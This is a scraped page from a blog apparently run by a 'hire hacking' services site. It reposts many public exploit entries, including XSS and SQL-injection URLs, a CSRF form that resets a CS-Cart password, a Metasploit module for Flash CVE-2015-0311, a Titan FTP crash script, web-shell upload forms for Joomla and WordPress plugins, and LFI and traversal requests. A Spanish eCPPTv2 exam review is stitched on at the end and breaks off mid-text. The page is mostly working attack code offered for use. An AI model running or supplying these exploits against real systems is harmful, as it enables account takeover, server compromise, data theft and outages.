Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130442

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/50806/info
   
HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   
http://www.example.com/nnm/protected/statuspoll.jsp?nodename=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/50806/info
    
HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
    
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    
http://www.example.com/protected/traceroute.jsp?nodename=[xss]
HireHackking 
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]

Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.

Exploit pasted below and attached.

<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
    Exploit By: Connection
    Blacksun Hacker's Club
    irc.blacksunhackers.com #lobby
-->
    <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
      <input type="hidden" name="user_data[password1]" value="CSRFpass" />
      <input type="hidden" name="user_data[password2]" value="CSRFpass" />
      <input type="hidden" name="user_data[profile_name]" value="Concept" />
      <input type="hidden" name="dispatch[profiles.update]" value="" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>


Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
      'Description'         => %q{
        This module exploits an use after free vulnerability in Adobe Flash Player. The
        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
        to uncompress() a malformed byte stream. This module has been tested successfully
        on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
        16.0.0.235.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'hdarwin', # Public exploit by @hdarwin89
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0311'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
          ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 28 2014',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end
HireHackking

Titan FTP Server 8.40 - 'APPE' Remote Denial of Service

HACKER · %s · %s

source: https://www.securityfocus.com/bid/50819/info Titan FTP Server is prone to a remote denial-of-service vulnerability. Exploiting this issue allows remote attackers to crash the affected FTP server, denying service to legitimate users. Titan FTP Server 8.40 is vulnerable; other versions may also be affected. #!/usr/bin/python # # Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash # Date: 25/11/2011 # Author: Houssam Sahli # Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe # Version: 8.40 # Developed by : South River Technologies, Inc. # Tested on: Windows XP SP3 French # Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death". # Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it. print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft" print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj" print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U" print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f" print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft" print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft" print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12" print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU" print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft" print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU" print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f" print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft" print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12" print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU" print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2" print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf" print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2" print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J" print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11" print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf" print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1" print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf" print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12" print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU" print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22" print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2" print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F" print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf" print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21" print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf" print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1" print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n" print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n" import socket import sys def Usage(): print ("Usage: ./expl.py <host> <Username> <password>\n") buffer= "./A" * 2000 def start(hostname, username, passwd): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] " + r sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] wait for the crash...;)" sock.send("APPE %s\r\n" %buffer) sock.close() if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) sys.exit(0)
HireHackking

WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/50824/info Skysa App Bar Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss]
HireHackking
source: https://www.securityfocus.com/bid/50839/info Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. Manx 1.0.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager_old/ajax_get_file_listing.php?limit="><script>alert(1)</script> http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager_old/ajax_get_file_listing.php?limit=5&search=1&search_folder=</script><script>alert(1)</script>Waddup Thricer!
HireHackking
source: https://www.securityfocus.com/bid/50839/info Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. Manx 1.0.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/admin_pages.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
HireHackking

Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)

HACKER · %s · %s

# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution] # Date: [Mar 13, 2015] # Exploit Author: [BGA Security] # Vendor Homepage: [http://www.citrix.com/] # Version: [NS10.5] # Tested on: [NetScaler NS10.5: Build 50.9.nc,] Document Title: ============ Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution Release Date: =========== 12 Mar 2015 Product & Service Introduction: ======================== Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications. Abstract Advisory Information: ======================= BGA Security Team discovered an HTTP Header Pollution vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable) Vulnerability Disclosure Timeline: ========================= 2 Feb 2015 Bug reported to the vendor. 4 Feb 2015 Vendor returned with a case ID. 5 Feb 2015 Detailed info/config given. 12 Feb 2015 Asked about the case. 16 Feb 2015 Vendor returned "investigating ..." 6 Mar 2015 Asked about the case. 6 Mar 2015 Vendor has validated the issue. 12 Mar 2015 There aren't any fix addressing the issue. Discovery Status: ============= Published Affected Product(s): =============== Citrix Systems, Inc. Product: Citrix Netscaler NS10.5 (other versions may be vulnerable) Exploitation Technique: ================== Remote, Unauthenticated Severity Level: =========== High Technical Details & Description: ======================== It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup: An Apache web server with default configuration on Windows (XAMPP). A SOAP web service which has written in PHP and vulnerable to SQL injection. Netscaler WAF with SQL injection rules. First request: ‘ union select current_user,2# - Netscaler blocks it. Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it. Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it. Proof of Concept (PoC): ================== Proof of Concept Request: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <string>’ union select current_user, 2#</string> </soapenv:Body> </soapenv:Envelope> Response: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <return xsi:type=“xsd:string”> Name: root@localhost </return> </soap:Body> </soap:Envelope> Solution Fix & Patch: ================ 12 Mar 2015 There aren't any fix addressing the issue. Security Risk: ========== The risk of the vulnerability above estimated as high. Credits & Authors: ============== BGA Bilgi Güvenliği - Onur ALANBEL Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bga.com.tr Social: twitter.com/bgasecurity Contact: bilgi@bga.com.tr Copyright © 2015 | BGA
HireHackking

Codiad 2.5.3 - Local File Inclusion

HACKER · %s · %s

[+]Title: Codiad v2.5.3 - LFI Vulnerability [+]Author: TUNISIAN CYBER [+]Date: 12/03/2015 [+]Type:WebApp [+]Risk:High [+]Overview: Pie Register 2.x suffers, from a Local File Disclosure vulnerability. [+]Proof Of Concept: [PHP] ////////////////////////////////////////////////////////////////// // Run Download ////////////////////////////////////////////////////////////////// if(isset($_GET['type']) && ($_GET['type']=='directory' || $_GET['type']=='root')){ // Create tarball $filename = explode("/",$_GET['path']); //$filename = array_pop($filename) . "-" . date('Y.m.d') . ".tar.gz"; $filename = array_pop($filename) . "-" . date('Y.m.d'); $targetPath = DATA . '/'; $dir = WORKSPACE . '/' . $_GET['path']; if(!is_dir($dir)){ exit('<script>parent.codiad.message.error("Directory not found.")</script>'); } ////////////////////////////////////////////////////////////////// // Check system() command and a non windows OS ////////////////////////////////////////////////////////////////// if(isAvailable('system') && stripos(PHP_OS, 'win') === false){ # Execute the tar command and save file $filename .= '.tar.gz'; system("tar -pczf ".$targetPath.$filename." -C ".WORKSPACE." ".$_GET['path']); $download_file = $targetPath.$filename; }elseif(extension_loaded('zip')){ //Check if zip-Extension is availiable //build zipfile require_once 'class.dirzip.php'; $filename .= '.zip'; $download_file = $targetPath.$filename; DirZip::zipDir($dir, $targetPath .$filename); }else{ exit('<script>parent.codiad.message.error("Could not pack the folder, zip-extension missing")</script>'); } }else{ $filename = explode("/",$_GET['path']); $filename = array_pop($filename); $download_file = WORKSPACE . '/' . $_GET['path']; } [PHP] http://demo.codiad.com/i/197156553/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined
HireHackking
###################################################################### # Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload # Google Dork: inurl:com_simplephotogallery # Date: 10.03.2015 # Exploit Author: CrashBandicot @DosPerl # My Github: github.com/CCrashBandicot # Vendor Homepage: https://www.apptha.com/ # Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery # Version: 1 # Tested on: Windows ###################################################################### # Vulnerable File : uploadFile.php # Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php 20. $fieldName = 'uploadfile'; 87. $fileTemp = $_FILES[$fieldName]['tmp_name']; 94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName; 96. if(! move_uploaded_file($fileTemp, $uploadPath)) # Exploit : <form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" > <input type="file" name="uploadfile"><br> <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br> <input type="submit" name="Submit" value="Pwn!"> </form> # Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php) # Shell Path : http://localhost/backdoor__[RandomString].php
HireHackking

WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # Google Dork: inurl:wp-content/plugins/reflex-gallery/ # Date: 08.03.2015 # Exploit Author: CrashBandicot @DosPerl # Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/ # Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip # Version: 3.1.3 (Last) # Tested on: Windows # p0C : http://i.imgur.com/mj8yADU.png # Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php # add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. " Vulnerable File : php.php 50. if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){ 173. $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/'); # Exploit : <form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" > <input type="file" name="qqfile"><br> <input type="submit" name="Submit" value="Pwn!"> </form> # Shell Path : http://127.0.0.1:1337/wordpress/wp-content/uploads/2015/03/backdoor.php
HireHackking

Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal

HACKER · %s · %s

source: https://www.securityfocus.com/bid/50841/info Virtual Vertex Muster is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface. Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. Virtual Vertex Muster 6.1.6 is vulnerable; other versions may also be affected. The following example request is available: GET /a\..\..\muster.db HTTP/1.1
HireHackking
source: https://www.securityfocus.com/bid/50857/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected. http://www.example.com/lib/controllers/centralcontroller.php?capturemode=updatemode&uniqcode=NAT&id=1 %27%20union%20select%20version%28%29,user%28%29%20--%20
HireHackking
source: https://www.securityfocus.com/bid/50822/info eSyndiCat Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. eSyndiCat Pro 2.3.05 is vulnerable; other versions may also be affected. http://www.example.com/demo/admin/controller.php?file=admins&do=edit&id=XSS http://www.example.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS http://www.example.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS http://www.example.com/demo/admin/controller.php?file=suggest-category&id=XSS http://www.example.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS
HireHackking
source: https://www.securityfocus.com/bid/50839/info Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. Manx 1.0.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit="><script>alert(1)</script> http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit=5&search=1&search_folder=</script><script>alert(1)</script>Waddup Thricer!
HireHackking
source: https://www.securityfocus.com/bid/50839/info Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. Manx 1.0.1 is vulnerable; other versions may also be affected. http://www.example.com/admin/admin_blocks.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
HireHackking

WoltLab Community Gallery - Persistent Cross-Site Scripting

HACKER · %s · %s

#Vulnerability title: Community Gallery - Stored Cross-Site Scripting vulnerability #Product: Community Gallery #Vendor: https://www.woltlab.com #Affected version: Community Gallery 2.0 before 12/10/2014 #Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery #Fixed version: Community Gallery 2.0 after 12/26/2014 #CVE ID: CVE-2015-2275 #Author: Pham Kien Cuong (cuong.k.pham (at) itas (dot) vn [email concealed]) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: + REQUEST: POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/ Content-Length: 1300 Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620 Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1 - Vulnerable parameter: parameters[data][7][title] ::DISCLOSURE:: + 12/10/2014: Detect vulnerability + 12/10/2014: Send the detail vulnerability to vendor + 03/11/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html - https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2275
HireHackking
Estos últimos días he estado un poco ausente en general porque me estaba examinando del eCPPTv2. Ayer envié el reporte y…
¡Aprobado!. Así que ya tengo la capacidad de poder hacer una review de esta certificación.
Antes que nada, voy a seguir un poco la estructura que hice con la review del eJPT:
Contexto ¿Vale la pena? ¿Qué tan difícil es? ¿Qué necesito saber? ¿Cómo es el examen? Tips Cheatsheet para aprobar 100% seguro no fake
Contexto
El eCPPTv2 o eLearnSecurity Certified Professional Penetration Tester, es el siguiente paso al eJPT. Lo que es para Offensive Security el OSCP, lo es el eCPPT para eLearnSecurity. Es una certificación 100% práctica que según eLearnSecurity abarca los siguientes temas:
Penetration testing processes and methodologies, against Windows and Linux targets Vulnerability Assessment of Networks Vulnerability Assessment of Web Applications Advanced Exploitation with Metasploit Performing Attacks in Pivoting Web application Manual exploitation Information Gathering and Reconnaissance Scanning and Profiling the target Privilege escalation and Persistence Exploit Development Advanced Reporting skills and Remediation
¿Vale la pena?
Pues pienso que sí. La verdad que además de que al final es un plus para el curriculum y eso. La certificación como tal es muy entretenida, tocas diversas temáticas que mencionaremos más adelante, y te expones ante un laboratorio bastante completo donde tendrás que ejecutar tanto ataques web, de sistema, buffer overflow o escaladas de privilegios. La verdad que es una certificación muy chula.
¿Qué tan difícil es?
Pues personalmente diría que no es difícil, que ojo, esto no quiere decir que sea fácil. La certificación te exige una base de conocimientos que si no tienes no podrás pasarla. Mayormente, porque no podrás abarcar nada en el examen. Para alguien que recién empieza y se acaba de certificar del eJPT esta certificación le puede parecer un mundo. Porque la base que te exige el eCPPT no es ni por asomo la mitad de lo que te exige el eJPT.
Sin embargo, conociendo bien los temas y teniendo una base medianamente sólida de lo que necesitas, podrás no solo defenderte en el examen, sino desarrollarte y mejorar en el mismo.
¿Qué necesito saber?
Pues personalmente, lo que yo considero que debes de saber para poder abordar con éxito es lo siguiente:
Pivoting/Port Forwarding tanto en Windows como en Linux Enumeración desde máquinas que no sean la tuya (muy útil los binarios compilados) Enumeración post-explotación en sistemas Windows y Linux Persistencia en Windows Escalada de Privilegios Ataques webs comunes Ataques comunes en Windows Buffer Overflow Además de esto, te puede venir bien saber algún que otro módulo de enumeración post-explotación de metasploit.
El pivoting es super mega hiper importante. No puedes aprobar el examen si no sabes hacerlo, necesitas saber como funciona perfectamente y saber usar las herramientas correspondientes cuando hagan falta. Sabiendo manejar socat y chisel es suficiente, con eso ya puedes realizar todo lo que tengas que hacer, aun así, también te puede venir bien saber usar proxychains o netsh. Pero como tal, lo obligatorio y mínimo es chisel y socat (de todas estas herramientas tenéis posts aquí en el blog). En resumen, sin pivoting te vas pal carajo.
Además de esto, saber enumerar a nivel web (no me refiero explícitamente a Fuzzing), ataques web comunes, enumeración en sistemas Linux y Windows, escalada de privilegios… Todos son conocimientos esenciales de cara al examen. Saber usar herramientas como CrackMapExec, psexec o mimikatz te vendrán fenomenal. Saber también como exponer puertos internos utilizando netsh, saber que es el LocalAccountTokenFilterPolicy y como te puede afectar, todas estas cosas suman y te ayudarán y facilitarán la vida mucho.
Por último, y no menos importante, el buen buffer overflow. Saber hacer un buffer overflow es indispensable, el que aparece en el examen es del mismo estilo que en el (antiguo) OSCP, es decir, sin protecciones y de 32 bits. El más básico de todos, literalmente sabiendo hacer lo mismo que en este post de SLMail ya vas bien. Así que, de cara al examen, ten preparado un buen Windows 7 de 32 bits con Immunity Debugger y Mona.
¿Cómo es el examen?
Cuando comienzas la certificación básicamente se te entregan dos cosas, una es la «carta de compromiso» la cual básicamente te explica como funciona el examen, el objetivo, cosas a tener en cuenta para el laboratorio y el reporte. Digamos que es todo el contexto que necesitas.
